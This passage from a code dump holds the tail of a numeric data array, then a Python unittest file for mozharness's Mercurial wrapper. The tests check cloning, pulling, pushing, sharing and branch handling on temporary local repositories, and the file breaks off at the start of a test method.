4630,5634,4417,5707,4832,5992,3418,6124,5993,5567,4768,5218,6520,4595,3458,5367,
6125,5635,6126,4202,6521,4740,4924,6307,3981,4069,4385,6308,3883,2675,4051,3834,
4302,4483,5568,5994,4972,4101,5368,6309,5164,5884,3922,6127,6522,6523,5261,5460,
5187,4164,5219,3538,5516,4111,3524,5995,6310,6311,5369,3181,3386,2484,5188,3464,
5569,3627,5708,6524,5406,5165,4677,4492,6312,4872,4851,5885,4468,5996,6313,5709,
5710,6128,2470,5886,6314,5293,4882,5785,3325,5461,5101,6129,5711,5786,6525,4906,
6526,6527,4418,5887,5712,4808,2907,3701,5713,5888,6528,3765,5636,5331,6529,6530,
3593,5889,3637,4943,3692,5714,5787,4925,6315,6130,5462,4405,6131,6132,6316,5262,
6531,6532,5715,3859,5716,5070,4696,5102,3929,5788,3987,4792,5997,6533,6534,3920,
4809,5000,5998,6535,2974,5370,6317,5189,5263,5717,3826,6536,3953,5001,4883,3190,
5463,5890,4973,5999,4741,6133,6134,3607,5570,6000,4711,3362,3630,4552,5041,6318,
6001,2950,2953,5637,4646,5371,4944,6002,2044,4120,3429,6319,6537,5103,4833,6538,
6539,4884,4647,3884,6003,6004,4758,3835,5220,5789,4565,5407,6540,6135,5294,4697,
4852,6320,6321,3206,4907,6541,6322,4945,6542,6136,6543,6323,6005,4631,3519,6544,
5891,6545,5464,3784,5221,6546,5571,4659,6547,6324,6137,5190,6548,3853,6549,4016,
4834,3954,6138,5332,3827,4017,3210,3546,4469,5408,5718,3505,4648,5790,5131,5638,
5791,5465,4727,4318,6325,6326,5792,4553,4010,4698,3439,4974,3638,4335,3085,6006,
5104,5042,5166,5892,5572,6327,4356,4519,5222,5573,5333,5793,5043,6550,5639,5071,
4503,6328,6139,6551,6140,3914,3901,5372,6007,5640,4728,4793,3976,3836,4885,6552,
4127,6553,4451,4102,5002,6554,3686,5105,6555,5191,5072,5295,4611,5794,5296,6556,
5893,5264,5894,4975,5466,5265,4699,4976,4370,4056,3492,5044,4886,6557,5795,4432,
4769,4357,5467,3940,4660,4290,6141,4484,4770,4661,3992,6329,4025,4662,5022,4632,
4835,4070,5297,4663,4596,5574,5132,5409,5895,6142,4504,5192,4664,5796,5896,3885,
5575,5797,5023,4810,5798,3732,5223,4712,5298,4084,5334,5468,6143,4052,4053,4336,
4977,4794,6558,5335,4908,5576,5224,4233,5024,4128,5469,5225,4873,6008,5045,4729,
4742,4633,3675,4597,6559,5897,5133,5577,5003,5641,5719,6330,6560,3017,2382,3854,
4406,4811,6331,4393,3964,4946,6561,2420,3722,6562,4926,4378,3247,1736,4442,6332,
5134,6333,5226,3996,2918,5470,4319,4003,4598,4743,4744,4485,3785,3902,5167,5004,
5373,4394,5898,6144,4874,1793,3997,6334,4085,4214,5106,5642,4909,5799,6009,4419,
4189,3330,5899,4165,4420,5299,5720,5227,3347,6145,4081,6335,2876,3930,6146,3293,
3786,3910,3998,5900,5300,5578,2840,6563,5901,5579,6147,3531,5374,6564,6565,5580,
4759,5375,6566,6148,3559,5643,6336,6010,5517,6337,6338,5721,5902,3873,6011,6339,
6567,5518,3868,3649,5722,6568,4771,4947,6569,6149,4812,6570,2853,5471,6340,6341,
5644,4795,6342,6012,5723,6343,5724,6013,4349,6344,3160,6150,5193,4599,4514,4493,
5168,4320,6345,4927,3666,4745,5169,5903,5005,4928,6346,5725,6014,4730,4203,5046,
4948,3395,5170,6015,4150,6016,5726,5519,6347,5047,3550,6151,6348,4197,4310,5904,
6571,5581,2965,6152,4978,3960,4291,5135,6572,5301,5727,4129,4026,5905,4853,5728,
5472,6153,6349,4533,2700,4505,5336,4678,3583,5073,2994,4486,3043,4554,5520,6350,
6017,5800,4487,6351,3931,4103,5376,6352,4011,4321,4311,4190,5136,6018,3988,3233,
4350,5906,5645,4198,6573,5107,3432,4191,3435,5582,6574,4139,5410,6353,5411,3944,
5583,5074,3198,6575,6354,4358,6576,5302,4600,5584,5194,5412,6577,6578,5585,5413,
5303,4248,5414,3879,4433,6579,4479,5025,4854,5415,6355,4760,4772,3683,2978,4700,
3797,4452,3965,3932,3721,4910,5801,6580,5195,3551,5907,3221,3471,3029,6019,3999,
5908,5909,5266,5267,3444,3023,3828,3170,4796,5646,4979,4259,6356,5647,5337,3694,
6357,5648,5338,4520,4322,5802,3031,3759,4071,6020,5586,4836,4386,5048,6581,3571,
4679,4174,4949,6154,4813,3787,3402,3822,3958,3215,3552,5268,4387,3933,4950,4359,
6021,5910,5075,3579,6358,4234,4566,5521,6359,3613,5049,6022,5911,3375,3702,3178,
4911,5339,4521,6582,6583,4395,3087,3811,5377,6023,6360,6155,4027,5171,5649,4421,
4249,2804,6584,2270,6585,4000,4235,3045,6156,5137,5729,4140,4312,3886,6361,4330,
6157,4215,6158,3500,3676,4929,4331,3713,4930,5912,4265,3776,3368,5587,4470,4855,
3038,4980,3631,6159,6160,4132,4680,6161,6362,3923,4379,5588,4255,6586,4121,6587,
6363,4649,6364,3288,4773,4774,6162,6024,6365,3543,6588,4274,3107,3737,5050,5803,
4797,4522,5589,5051,5730,3714,4887,5378,4001,4523,6163,5026,5522,4701,4175,2791,
3760,6589,5473,4224,4133,3847,4814,4815,4775,3259,5416,6590,2738,6164,6025,5304,
3733,5076,5650,4816,5590,6591,6165,6592,3934,5269,6593,3396,5340,6594,5804,3445,
3602,4042,4488,5731,5732,3525,5591,4601,5196,6166,6026,5172,3642,4612,3202,4506,
4798,6366,3818,5108,4303,5138,5139,4776,3332,4304,2915,3415,4434,5077,5109,4856,
2879,5305,4817,6595,5913,3104,3144,3903,4634,5341,3133,5110,5651,5805,6167,4057,
5592,2945,4371,5593,6596,3474,4182,6367,6597,6168,4507,4279,6598,2822,6599,4777,
4713,5594,3829,6169,3887,5417,6170,3653,5474,6368,4216,2971,5228,3790,4579,6369,
5733,6600,6601,4951,4746,4555,6602,5418,5475,6027,3400,4665,5806,6171,4799,6028,
5052,6172,3343,4800,4747,5006,6370,4556,4217,5476,4396,5229,5379,5477,3839,5914,
5652,5807,4714,3068,4635,5808,6173,5342,4192,5078,5419,5523,5734,6174,4557,6175,
4602,6371,6176,6603,5809,6372,5735,4260,3869,5111,5230,6029,5112,6177,3126,4681,
5524,5915,2706,3563,4748,3130,6178,4018,5525,6604,6605,5478,4012,4837,6606,4534,
4193,5810,4857,3615,5479,6030,4082,3697,3539,4086,5270,3662,4508,4931,5916,4912,
5811,5027,3888,6607,4397,3527,3302,3798,2775,2921,2637,3966,4122,4388,4028,4054,
1633,4858,5079,3024,5007,3982,3412,5736,6608,3426,3236,5595,3030,6179,3427,3336,
3279,3110,6373,3874,3039,5080,5917,5140,4489,3119,6374,5812,3405,4494,6031,4666,
4141,6180,4166,6032,5813,4981,6609,5081,4422,4982,4112,3915,5653,3296,3983,6375,
4266,4410,5654,6610,6181,3436,5082,6611,5380,6033,3819,5596,4535,5231,5306,5113,
6612,4952,5918,4275,3113,6613,6376,6182,6183,5814,3073,4731,4838,5008,3831,6614,
4888,3090,3848,4280,5526,5232,3014,5655,5009,5737,5420,5527,6615,5815,5343,5173,
5381,4818,6616,3151,4953,6617,5738,2796,3204,4360,2989,4281,5739,5174,5421,5197,
3132,5141,3849,5142,5528,5083,3799,3904,4839,5480,2880,4495,3448,6377,6184,5271,
5919,3771,3193,6034,6035,5920,5010,6036,5597,6037,6378,6038,3106,5422,6618,5423,
5424,4142,6619,4889,5084,4890,4313,5740,6620,3437,5175,5307,5816,4199,5198,5529,
5817,5199,5656,4913,5028,5344,3850,6185,2955,5272,5011,5818,4567,4580,5029,5921,
3616,5233,6621,6622,6186,4176,6039,6379,6380,3352,5200,5273,2908,5598,5234,3837,
5308,6623,6624,5819,4496,4323,5309,5201,6625,6626,4983,3194,3838,4167,5530,5922,
5274,6381,6382,3860,3861,5599,3333,4292,4509,6383,3553,5481,5820,5531,4778,6187,
3955,3956,4324,4389,4218,3945,4325,3397,2681,5923,4779,5085,4019,5482,4891,5382,
5383,6040,4682,3425,5275,4094,6627,5310,3015,5483,5657,4398,5924,3168,4819,6628,
5925,6629,5532,4932,4613,6041,6630,4636,6384,4780,4204,5658,4423,5821,3989,4683,
5822,6385,4954,6631,5345,6188,5425,5012,5384,3894,6386,4490,4104,6632,5741,5053,
6633,5823,5926,5659,5660,5927,6634,5235,5742,5824,4840,4933,4820,6387,4859,5928,
4955,6388,4143,3584,5825,5346,5013,6635,5661,6389,5014,5484,5743,4337,5176,5662,
6390,2836,6391,3268,6392,6636,6042,5236,6637,4158,6638,5744,5663,4471,5347,3663,
4123,5143,4293,3895,6639,6640,5311,5929,5826,3800,6189,6393,6190,5664,5348,3554,
3594,4749,4603,6641,5385,4801,6043,5827,4183,6642,5312,5426,4761,6394,5665,6191,
4715,2669,6643,6644,5533,3185,5427,5086,5930,5931,5386,6192,6044,6645,4781,4013,
5745,4282,4435,5534,4390,4267,6045,5746,4984,6046,2743,6193,3501,4087,5485,5932,
5428,4184,4095,5747,4061,5054,3058,3862,5933,5600,6646,5144,3618,6395,3131,5055,
5313,6396,4650,4956,3855,6194,3896,5202,4985,4029,4225,6195,6647,5828,5486,5829,
3589,3002,6648,6397,4782,5276,6649,6196,6650,4105,3803,4043,5237,5830,6398,4096,
3643,6399,3528,6651,4453,3315,4637,6652,3984,6197,5535,3182,3339,6653,3096,2660,
6400,6654,3449,5934,4250,4236,6047,6401,5831,6655,5487,3753,4062,5832,6198,6199,
6656,3766,6657,3403,4667,6048,6658,4338,2897,5833,3880,2797,3780,4326,6659,5748,
5015,6660,5387,4351,5601,4411,6661,3654,4424,5935,4339,4072,5277,4568,5536,6402,
6662,5238,6663,5349,5203,6200,5204,6201,5145,4536,5016,5056,4762,5834,4399,4957,
6202,6403,5666,5749,6664,4340,6665,5936,5177,5667,6666,6667,3459,4668,6404,6668,
6669,4543,6203,6670,4276,6405,4480,5537,6671,4614,5205,5668,6672,3348,2193,4763,
6406,6204,5937,5602,4177,5669,3419,6673,4020,6205,4443,4569,5388,3715,3639,6407,
6049,4058,6206,6674,5938,4544,6050,4185,4294,4841,4651,4615,5488,6207,6408,6051,
5178,3241,3509,5835,6208,4958,5836,4341,5489,5278,6209,2823,5538,5350,5206,5429,
6675,4638,4875,4073,3516,4684,4914,4860,5939,5603,5389,6052,5057,3237,5490,3791,
6676,6409,6677,4821,4915,4106,5351,5058,4243,5539,4244,5604,4842,4916,5239,3028,
3716,5837,5114,5605,5390,5940,5430,6210,4332,6678,5540,4732,3667,3840,6053,4305,
3408,5670,5541,6410,2744,5240,5750,6679,3234,5606,6680,5607,5671,3608,4283,4159,
4400,5352,4783,6681,6411,6682,4491,4802,6211,6412,5941,6413,6414,5542,5751,6683,
4669,3734,5942,6684,6415,5943,5059,3328,4670,4144,4268,6685,6686,6687,6688,4372,
3603,6689,5944,5491,4373,3440,6416,5543,4784,4822,5608,3792,4616,5838,5672,3514,
5391,6417,4892,6690,4639,6691,6054,5673,5839,6055,6692,6056,5392,6212,4038,5544,
5674,4497,6057,6693,5840,4284,5675,4021,4545,5609,6418,4454,6419,6213,4113,4472,
5314,3738,5087,5279,4074,5610,4959,4063,3179,4750,6058,6420,6214,3476,4498,4716,
5431,4960,4685,6215,5241,6694,6421,6216,6695,5841,5945,6422,3748,5946,5179,3905,
5752,5545,5947,4374,6217,4455,6423,4412,6218,4803,5353,6696,3832,5280,6219,4327,
4702,6220,6221,6059,4652,5432,6424,3749,4751,6425,5753,4986,5393,4917,5948,5030,
5754,4861,4733,6426,4703,6697,6222,4671,5949,4546,4961,5180,6223,5031,3316,5281,
6698,4862,4295,4934,5207,3644,6427,5842,5950,6428,6429,4570,5843,5282,6430,6224,
5088,3239,6060,6699,5844,5755,6061,6431,2701,5546,6432,5115,5676,4039,3993,3327,
4752,4425,5315,6433,3941,6434,5677,4617,4604,3074,4581,6225,5433,6435,6226,6062,
4823,5756,5116,6227,3717,5678,4717,5845,6436,5679,5846,6063,5847,6064,3977,3354,
6437,3863,5117,6228,5547,5394,4499,4524,6229,4605,6230,4306,4500,6700,5951,6065,
3693,5952,5089,4366,4918,6701,6231,5548,6232,6702,6438,4704,5434,6703,6704,5953,
4168,6705,5680,3420,6706,5242,4407,6066,3812,5757,5090,5954,4672,4525,3481,5681,
4618,5395,5354,5316,5955,6439,4962,6707,4526,6440,3465,4673,6067,6441,5682,6708,
5435,5492,5758,5683,4619,4571,4674,4804,4893,4686,5493,4753,6233,6068,4269,6442,
6234,5032,4705,5146,5243,5208,5848,6235,6443,4963,5033,4640,4226,6236,5849,3387,
6444,6445,4436,4437,5850,4843,5494,4785,4894,6709,4361,6710,5091,5956,3331,6237,
4987,5549,6069,6711,4342,3517,4473,5317,6070,6712,6071,4706,6446,5017,5355,6713,
6714,4988,5436,6447,4734,5759,6715,4735,4547,4456,4754,6448,5851,6449,6450,3547,
5852,5318,6451,6452,5092,4205,6716,6238,4620,4219,5611,6239,6072,4481,5760,5957,
5958,4059,6240,6453,4227,4537,6241,5761,4030,4186,5244,5209,3761,4457,4876,3337,
5495,5181,6242,5959,5319,5612,5684,5853,3493,5854,6073,4169,5613,5147,4895,6074,
5210,6717,5182,6718,3830,6243,2798,3841,6075,6244,5855,5614,3604,4606,5496,5685,
5118,5356,6719,6454,5960,5357,5961,6720,4145,3935,4621,5119,5962,4261,6721,6455,
4786,5963,4375,4582,6245,6246,6247,6076,5437,4877,5856,3376,4380,6248,4160,6722,
5148,6456,5211,6457,6723,4718,6458,6724,6249,5358,4044,3297,6459,6250,5857,5615,
5497,5245,6460,5498,6725,6251,6252,5550,3793,5499,2959,5396,6461,6462,4572,5093,
5500,5964,3806,4146,6463,4426,5762,5858,6077,6253,4755,3967,4220,5965,6254,4989,
5501,6464,4352,6726,6078,4764,2290,5246,3906,5438,5283,3767,4964,2861,5763,5094,
6255,6256,4622,5616,5859,5860,4707,6727,4285,4708,4824,5617,6257,5551,4787,5212,
4965,4935,4687,6465,6728,6466,5686,6079,3494,4413,2995,5247,5966,5618,6729,5967,
5764,5765,5687,5502,6730,6731,6080,5397,6467,4990,6258,6732,4538,5060,5619,6733,
4719,5688,5439,5018,5149,5284,5503,6734,6081,4607,6259,5120,3645,5861,4583,6260,
4584,4675,5620,4098,5440,6261,4863,2379,3306,4585,5552,5689,4586,5285,6735,4864,
6736,5286,6082,6737,4623,3010,4788,4381,4558,5621,4587,4896,3698,3161,5248,4353,
4045,6262,3754,5183,4588,6738,6263,6739,6740,5622,3936,6741,6468,6742,6264,5095,
6469,4991,5968,6743,4992,6744,6083,4897,6745,4256,5766,4307,3108,3968,4444,5287,
3889,4343,6084,4510,6085,4559,6086,4898,5969,6746,5623,5061,4919,5249,5250,5504,
5441,6265,5320,4878,3242,5862,5251,3428,6087,6747,4237,5624,5442,6266,5553,4539,
6748,2585,3533,5398,4262,6088,5150,4736,4438,6089,6267,5505,4966,6749,6268,6750,
6269,5288,5554,3650,6090,6091,4624,6092,5690,6751,5863,4270,5691,4277,5555,5864,
6752,5692,4720,4865,6470,5151,4688,4825,6753,3094,6754,6471,3235,4653,6755,5213,
5399,6756,3201,4589,5865,4967,6472,5866,6473,5019,3016,6757,5321,4756,3957,4573,
6093,4993,5767,4721,6474,6758,5625,6759,4458,6475,6270,6760,5556,4994,5214,5252,
6271,3875,5768,6094,5034,5506,4376,5769,6761,2120,6476,5253,5770,6762,5771,5970,
3990,5971,5557,5558,5772,6477,6095,2787,4641,5972,5121,6096,6097,6272,6763,3703,
5867,5507,6273,4206,6274,4789,6098,6764,3619,3646,3833,3804,2394,3788,4936,3978,
4866,4899,6099,6100,5559,6478,6765,3599,5868,6101,5869,5870,6275,6766,4527,6767)
# flake8: noqa
| gpl-3.0 |
lissyx/build-mozharness | test/test_base_vcs_mercurial.py | 11 | 22114 | import os
import platform
import shutil
import tempfile
import unittest
import mozharness.base.errors as errors
import mozharness.base.vcs.mercurial as mercurial
# Sample multi-line string fixture (not referenced by the visible tests).
test_string = '''foo
bar
baz'''
# Base hg command line, including the module's standard options.
HG = ['hg'] + mercurial.HG_OPTIONS
# Known default .hgrc
# Point mercurial at a checked-in .hgrc so the developer's personal
# configuration cannot influence test behavior.
os.environ['HGRCPATH'] = os.path.join(os.path.dirname(__file__), 'helper_files', '.hgrc')
def cleanup():
    """Remove artifacts (logs, scratch dirs, local configs) that test runs
    may have left in the current working directory."""
    if os.path.exists('test_logs'):
        shutil.rmtree('test_logs')
    # 'test_dir' may be either a directory or a plain file; handle both.
    if os.path.isdir('test_dir'):
        shutil.rmtree('test_dir')
    elif os.path.exists('test_dir'):
        os.remove('test_dir')
    for leftover in ('localconfig.json', 'localconfig.json.bak'):
        if os.path.exists(leftover):
            os.remove(leftover)
def get_mercurial_vcs_obj():
    """Return a fresh MercurialVCS instance with an empty config dict."""
    vcs = mercurial.MercurialVCS()
    vcs.config = {}
    return vcs
def get_revisions(dest):
    """Return the list of short changeset hashes for the repo at *dest*,
    in the order `hg log` emits them."""
    vcs = get_mercurial_vcs_obj()
    output = vcs.get_output_from_command(
        HG + ['log', '-R', dest, '--template', '{node|short}\n'])
    # Drop blank lines and surrounding whitespace.
    return [line.strip() for line in output.split('\n') if line.strip()]
class TestMakeAbsolute(unittest.TestCase):
    """Checks for MercurialVCS._make_absolute() path normalization."""
    # _make_absolute() doesn't play nicely with windows/msys paths, so these
    # checks are only defined off-Windows.
    # TODO: fix _make_absolute, write it out of the picture, or determine
    # that it's not needed on windows.
    if platform.system() not in ("Windows",):
        def test_absolute_path(self):
            vcs = get_mercurial_vcs_obj()
            self.assertEquals(vcs._make_absolute("/foo/bar"), "/foo/bar")
        def test_relative_path(self):
            vcs = get_mercurial_vcs_obj()
            expected = os.path.abspath("foo/bar")
            self.assertEquals(vcs._make_absolute("foo/bar"), expected)
        def test_HTTP_paths(self):
            vcs = get_mercurial_vcs_obj()
            self.assertEquals(vcs._make_absolute("http://foo/bar"),
                              "http://foo/bar")
        def test_absolute_file_path(self):
            vcs = get_mercurial_vcs_obj()
            self.assertEquals(vcs._make_absolute("file:///foo/bar"),
                              "file:///foo/bar")
        def test_relative_file_path(self):
            vcs = get_mercurial_vcs_obj()
            expected = "file://%s/foo/bar" % os.getcwd()
            self.assertEquals(vcs._make_absolute("file://foo/bar"), expected)
class TestHg(unittest.TestCase):
    """Integration tests for mozharness.base.vcs.mercurial.MercurialVCS.

    Each test builds a throwaway hg repository via
    helper_files/init_hgrepo.sh in a temp dir, exercises
    clone/pull/push/share/apply_and_push against it, and compares revision
    lists with get_revisions(). Requires a working `hg` and `bash` on PATH.
    """
    def _init_hg_repo(self, hg_obj, repodir):
        # Shell out to the helper script, which creates a known repo layout
        # (multiple changesets on 'default' plus a 'branch2' branch).
        hg_obj.run_command(["bash",
                            os.path.join(os.path.dirname(__file__),
                                         "helper_files", "init_hgrepo.sh"),
                            repodir])
    def setUp(self):
        # self.revisions[0] is the newest changeset ('hg log' default order).
        self.tmpdir = tempfile.mkdtemp()
        self.repodir = os.path.join(self.tmpdir, 'repo')
        m = get_mercurial_vcs_obj()
        self._init_hg_repo(m, self.repodir)
        self.revisions = get_revisions(self.repodir)
        self.wc = os.path.join(self.tmpdir, 'wc')
        self.pwd = os.getcwd()
    def tearDown(self):
        shutil.rmtree(self.tmpdir)
        os.chdir(self.pwd)
    def test_get_branch(self):
        m = get_mercurial_vcs_obj()
        m.clone(self.repodir, self.wc)
        b = m.get_branch_from_path(self.wc)
        self.assertEquals(b, 'default')
    def test_get_branches(self):
        m = get_mercurial_vcs_obj()
        m.clone(self.repodir, self.wc)
        branches = m.get_branches_from_path(self.wc)
        self.assertEquals(sorted(branches), sorted(["branch2", "default"]))
    def test_clone(self):
        # update_dest=False: history is cloned but no working copy checkout.
        m = get_mercurial_vcs_obj()
        rev = m.clone(self.repodir, self.wc, update_dest=False)
        self.assertEquals(rev, None)
        self.assertEquals(self.revisions, get_revisions(self.wc))
        self.assertEquals(sorted(os.listdir(self.wc)), ['.hg'])
    def test_clone_into_non_empty_dir(self):
        # Cloning should clobber pre-existing files in the destination.
        m = get_mercurial_vcs_obj()
        m.mkdir_p(self.wc)
        open(os.path.join(self.wc, 'test.txt'), 'w').write('hello')
        m.clone(self.repodir, self.wc, update_dest=False)
        self.failUnless(not os.path.exists(os.path.join(self.wc, 'test.txt')))
    def test_clone_update(self):
        m = get_mercurial_vcs_obj()
        rev = m.clone(self.repodir, self.wc, update_dest=True)
        self.assertEquals(rev, self.revisions[0])
    def test_clone_branch(self):
        m = get_mercurial_vcs_obj()
        m.clone(self.repodir, self.wc, branch='branch2',
                update_dest=False)
        # On hg 1.6, we should only have a subset of the revisions
        if m.hg_ver() >= (1, 6, 0):
            self.assertEquals(self.revisions[1:],
                              get_revisions(self.wc))
        else:
            self.assertEquals(self.revisions,
                              get_revisions(self.wc))
    def test_clone_update_branch(self):
        m = get_mercurial_vcs_obj()
        rev = m.clone(self.repodir, os.path.join(self.tmpdir, 'wc'),
                      branch="branch2", update_dest=True)
        self.assertEquals(rev, self.revisions[1], self.revisions)
    def test_clone_revision(self):
        m = get_mercurial_vcs_obj()
        m.clone(self.repodir, self.wc,
                revision=self.revisions[0], update_dest=False)
        # We'll only get a subset of the revisions
        self.assertEquals(self.revisions[:1] + self.revisions[2:],
                          get_revisions(self.wc))
    def test_update_revision(self):
        m = get_mercurial_vcs_obj()
        rev = m.clone(self.repodir, self.wc, update_dest=False)
        self.assertEquals(rev, None)
        rev = m.update(self.wc, revision=self.revisions[1])
        self.assertEquals(rev, self.revisions[1])
    def test_pull(self):
        m = get_mercurial_vcs_obj()
        # Clone just the first rev
        m.clone(self.repodir, self.wc, revision=self.revisions[-1], update_dest=False)
        self.assertEquals(get_revisions(self.wc), self.revisions[-1:])
        # Now pull in new changes
        rev = m.pull(self.repodir, self.wc, update_dest=False)
        self.assertEquals(rev, None)
        self.assertEquals(get_revisions(self.wc), self.revisions)
    def test_pull_revision(self):
        m = get_mercurial_vcs_obj()
        # Clone just the first rev
        m.clone(self.repodir, self.wc, revision=self.revisions[-1], update_dest=False)
        self.assertEquals(get_revisions(self.wc), self.revisions[-1:])
        # Now pull in just the last revision
        rev = m.pull(self.repodir, self.wc, revision=self.revisions[0], update_dest=False)
        self.assertEquals(rev, None)
        # We'll be missing the middle revision (on another branch)
        self.assertEquals(get_revisions(self.wc), self.revisions[:1] + self.revisions[2:])
    def test_pull_branch(self):
        m = get_mercurial_vcs_obj()
        # Clone just the first rev
        m.clone(self.repodir, self.wc, revision=self.revisions[-1], update_dest=False)
        self.assertEquals(get_revisions(self.wc), self.revisions[-1:])
        # Now pull in the other branch
        rev = m.pull(self.repodir, self.wc, branch="branch2", update_dest=False)
        self.assertEquals(rev, None)
        # On hg 1.6, we'll be missing the last revision (on another branch)
        if m.hg_ver() >= (1, 6, 0):
            self.assertEquals(get_revisions(self.wc), self.revisions[1:])
        else:
            self.assertEquals(get_revisions(self.wc), self.revisions)
    def test_pull_unrelated(self):
        # Pulling from a repo with no common ancestry must fail loudly.
        m = get_mercurial_vcs_obj()
        # Create a new repo
        repo2 = os.path.join(self.tmpdir, 'repo2')
        self._init_hg_repo(m, repo2)
        self.assertNotEqual(self.revisions, get_revisions(repo2))
        # Clone the original repo
        m.clone(self.repodir, self.wc, update_dest=False)
        # Hide the wanted error
        m.config = {'log_to_console': False}
        # Try and pull in changes from the new repo
        self.assertRaises(mercurial.VCSException, m.pull, repo2, self.wc, update_dest=False)
    def test_share_unrelated(self):
        # When sharing, switching to an unrelated repo should still work:
        # the share/working copy is re-created from the new repo.
        m = get_mercurial_vcs_obj()
        # Create a new repo
        repo2 = os.path.join(self.tmpdir, 'repo2')
        self._init_hg_repo(m, repo2)
        self.assertNotEqual(self.revisions, get_revisions(repo2))
        share_base = os.path.join(self.tmpdir, 'share')
        # Clone the original repo
        m.vcs_config = {'repo': self.repodir, 'dest': self.wc, 'vcs_share_base': share_base}
        m.ensure_repo_and_revision()
        # Clone the new repo
        m = get_mercurial_vcs_obj()
        m.vcs_config = {'repo': repo2, 'dest': self.wc, 'vcs_share_base': share_base}
        m.ensure_repo_and_revision()
        self.assertEquals(get_revisions(self.wc), get_revisions(repo2))
    def test_share_reset(self):
        # If the upstream repo is reset (history rewritten), the shared
        # working copy must follow the new history.
        m = get_mercurial_vcs_obj()
        share_base = os.path.join(self.tmpdir, 'share')
        m.vcs_config = {'repo': self.repodir, 'dest': self.wc, 'vcs_share_base': share_base}
        # Clone the original repo
        m.ensure_repo_and_revision()
        old_revs = self.revisions[:]
        # Reset the repo
        self._init_hg_repo(m, self.repodir)
        self.assertNotEqual(old_revs, get_revisions(self.repodir))
        # Try and update our working copy
        m = get_mercurial_vcs_obj()
        m.vcs_config = {'repo': self.repodir, 'dest': self.wc, 'vcs_share_base': share_base}
        m.config = {'log_to_console': False}
        m.ensure_repo_and_revision()
        self.assertEquals(get_revisions(self.repodir), get_revisions(self.wc))
        self.assertNotEqual(old_revs, get_revisions(self.wc))
    def test_push(self):
        m = get_mercurial_vcs_obj()
        m.clone(self.repodir, self.wc, revision=self.revisions[-2])
        m.push(src=self.repodir, remote=self.wc)
        self.assertEquals(get_revisions(self.wc), self.revisions)
    def test_push_with_branch(self):
        m = get_mercurial_vcs_obj()
        if m.hg_ver() >= (1, 6, 0):
            m.clone(self.repodir, self.wc, revision=self.revisions[-1])
            m.push(src=self.repodir, remote=self.wc, branch='branch2')
            m.push(src=self.repodir, remote=self.wc, branch='default')
            self.assertEquals(get_revisions(self.wc), self.revisions)
    def test_push_with_revision(self):
        m = get_mercurial_vcs_obj()
        m.clone(self.repodir, self.wc, revision=self.revisions[-2])
        m.push(src=self.repodir, remote=self.wc, revision=self.revisions[-1])
        self.assertEquals(get_revisions(self.wc), self.revisions[-2:])
    def test_mercurial(self):
        # ensure_repo_and_revision() should be idempotent.
        m = get_mercurial_vcs_obj()
        m.vcs_config = {'repo': self.repodir, 'dest': self.wc}
        m.ensure_repo_and_revision()
        rev = m.ensure_repo_and_revision()
        self.assertEquals(rev, self.revisions[0])
    def test_push_new_branches_not_allowed(self):
        m = get_mercurial_vcs_obj()
        m.clone(self.repodir, self.wc, revision=self.revisions[0])
        # Hide the wanted error
        m.config = {'log_to_console': False}
        self.assertRaises(Exception, m.push, self.repodir, self.wc, push_new_branches=False)
    def test_mercurial_with_new_share(self):
        m = get_mercurial_vcs_obj()
        share_base = os.path.join(self.tmpdir, 'share')
        # The share mirrors the source repo's path under share_base.
        sharerepo = os.path.join(share_base, self.repodir.lstrip("/"))
        os.mkdir(share_base)
        m.vcs_config = {'repo': self.repodir, 'dest': self.wc, 'vcs_share_base': share_base}
        m.ensure_repo_and_revision()
        self.assertEquals(get_revisions(self.repodir), get_revisions(self.wc))
        self.assertEquals(get_revisions(self.repodir), get_revisions(sharerepo))
    def test_mercurial_with_share_base_in_env(self):
        # HG_SHARE_BASE_DIR in the environment should enable sharing even
        # without vcs_share_base in the config.
        share_base = os.path.join(self.tmpdir, 'share')
        sharerepo = os.path.join(share_base, self.repodir.lstrip("/"))
        os.mkdir(share_base)
        try:
            os.environ['HG_SHARE_BASE_DIR'] = share_base
            m = get_mercurial_vcs_obj()
            m.vcs_config = {'repo': self.repodir, 'dest': self.wc}
            m.ensure_repo_and_revision()
            self.assertEquals(get_revisions(self.repodir), get_revisions(self.wc))
            self.assertEquals(get_revisions(self.repodir), get_revisions(sharerepo))
        finally:
            del os.environ['HG_SHARE_BASE_DIR']
    def test_mercurial_with_existing_share(self):
        m = get_mercurial_vcs_obj()
        share_base = os.path.join(self.tmpdir, 'share')
        sharerepo = os.path.join(share_base, self.repodir.lstrip("/"))
        os.mkdir(share_base)
        m.vcs_config = {'repo': self.repodir, 'dest': sharerepo}
        m.ensure_repo_and_revision()
        # Commit a new changeset upstream; the share must pick it up.
        open(os.path.join(self.repodir, 'test.txt'), 'w').write('hello!')
        m.run_command(HG + ['add', 'test.txt'], cwd=self.repodir)
        m.run_command(HG + ['commit', '-m', 'adding changeset'], cwd=self.repodir)
        m = get_mercurial_vcs_obj()
        m.vcs_config = {'repo': self.repodir, 'dest': self.wc, 'vcs_share_base': share_base}
        m.ensure_repo_and_revision()
        self.assertEquals(get_revisions(self.repodir), get_revisions(self.wc))
        self.assertEquals(get_revisions(self.repodir), get_revisions(sharerepo))
    def test_mercurial_relative_dir(self):
        # Relative repo/dest paths should be resolved from the current dir.
        m = get_mercurial_vcs_obj()
        repo = os.path.basename(self.repodir)
        wc = os.path.basename(self.wc)
        m.vcs_config = {'repo': repo, 'dest': wc, 'revision': self.revisions[-1]}
        m.chdir(os.path.dirname(self.repodir))
        try:
            rev = m.ensure_repo_and_revision()
            self.assertEquals(rev, self.revisions[-1])
            m.info("Creating test.txt")
            open(os.path.join(self.wc, 'test.txt'), 'w').write("hello!")
            m = get_mercurial_vcs_obj()
            m.vcs_config = {'repo': repo, 'dest': wc, 'revision': self.revisions[0]}
            rev = m.ensure_repo_and_revision()
            self.assertEquals(rev, self.revisions[0])
            # Make sure our local file didn't go away
            self.failUnless(os.path.exists(os.path.join(self.wc, 'test.txt')))
        finally:
            m.chdir(self.pwd)
    def test_mercurial_update_tip(self):
        m = get_mercurial_vcs_obj()
        m.vcs_config = {'repo': self.repodir, 'dest': self.wc, 'revision': self.revisions[-1]}
        rev = m.ensure_repo_and_revision()
        self.assertEquals(rev, self.revisions[-1])
        open(os.path.join(self.wc, 'test.txt'), 'w').write("hello!")
        m = get_mercurial_vcs_obj()
        m.vcs_config = {'repo': self.repodir, 'dest': self.wc}
        rev = m.ensure_repo_and_revision()
        self.assertEquals(rev, self.revisions[0])
        # Make sure our local file didn't go away
        self.failUnless(os.path.exists(os.path.join(self.wc, 'test.txt')))
    def test_mercurial_update_rev(self):
